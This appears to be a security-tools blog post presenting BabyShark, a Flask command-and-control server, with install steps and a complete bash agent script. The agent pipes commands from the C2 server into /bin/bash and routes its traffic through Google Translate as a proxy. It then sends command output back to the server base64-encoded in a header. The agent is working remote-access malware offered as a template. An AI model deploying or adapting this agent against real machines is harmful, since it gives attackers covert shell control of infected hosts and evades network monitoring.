BabyShark is a basic C2 generic server written in Python and Flask.
This code has based idea to GTRS, which uses Google Translator as a proxy for sending commands to the infected host. The BabyShark project aims to centralize reverse connections with agents, creating a way to centralize several types of connections in one place.
BabyShark does not generate infection agents, but it does offer a template to connect to it.
Installation
git clone https://github.com/danilovazb/BabyShark/
cd BabyShark
mkdir database
sqlite3 database/c2.db < schema.sql
Also Read – ANDRAX : NH-Killer Penetration Testing On Android
Agents Model
GTRS – https://github.com/mthbernardes/GTRS
This client example from GTRS for connect to BabyShark:
#!/bin/bash
if [[ $# < 2 ]];then
echo -e "Error\nExecute: $0 www.c2server.com secretkey-provided-by-the-server\n"
exit
fi
running=true
secretkey="b4bysh4rk"
user_agent="User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"
data="Content-Hype: "
c2server="http://babyshark/momyshark?key=$secretkey"
result=""
input="/tmp/input"
output="/tmp/output"
function namedpipe(){
rm "$input" "$output"
mkfifo "$input"
tail -f "$input" | /bin/bash 2>&1 > $output &
}
function getfirsturl(){
url="https://translate.google.com/translate?&anno=2&u=$c2server"
first=$(curl --silent "$url" -H "$user_agent" | xmllint --html --xpath '//iframe/@src' - 2>/dev/null | cut -d "=" -f2- | tr -d '"' | sed 's/amp;//g' )
}
function getsecondurl(){
second=$(curl --silent -L "$first" -H "$user_agent" | xmllint --html --xpath '//a/@href' - 2>/dev/null | cut -d "=" -f2- | tr -d '"' | sed 's/amp;//g')
}
function getcommand(){
if [[ "$result" ]];then
command=$(curl --silent $second -H "$result" )
else
command=$(curl --silent $second -H "$user_agent" )
command1=$(echo "$command" | xmllint --html --xpath '//span[@class="google-src-text"]/text()' - 2>/dev/null)
command2=$(echo "$command" | xmllint --html --xpath '/html/body/main/div/div/div/div/ul/li/span/text()' - 2>/dev/null )
if [[ "$command1" ]];then
command="$command1"
else
command="$command2"
fi
fi
}
function talktotranslate(){
getfirsturl
getsecondurl
getcommand
}
function main(){
result=""
sleep 10
talktotranslate
if [[ "$command" ]];then
if [[ "$command" == "exit" ]];then
running=false
fi
echo $command
echo -n > $output
idcommand=$(echo $command | cut -d '#' -f2)
echo "$command" > "$input"
sleep 2
outputb64=$(cat $output | tr -d '\000' | base64 | tr -d '\n' 2>/dev/null)
if [[ "$outputb64" ]];then
result="$user_agent | $outputb64 | $idcommand "
talktotranslate
fi
fi
}
namedpipe
while "$running";do
main
done Next Steps
A newly disclosed Android vulnerability is making noise for a good reason. Researchers showed that…
In MySQL Server 5.5 and earlier versions, the MyISAM was the default storage engine. So,…
A newly disclosed vulnerability in Microsoft Authenticator could expose one time sign in codes or…
Modrinth is a modern platform that’s rapidly changing the landscape of Minecraft modding, providing an…
A new, highly sophisticated malware campaign named BlackSanta has emerged, primarily targeting HR and recruitment…
Perplexity has unveiled an exciting new feature, Personal Computer, which allows AI agents to seamlessly…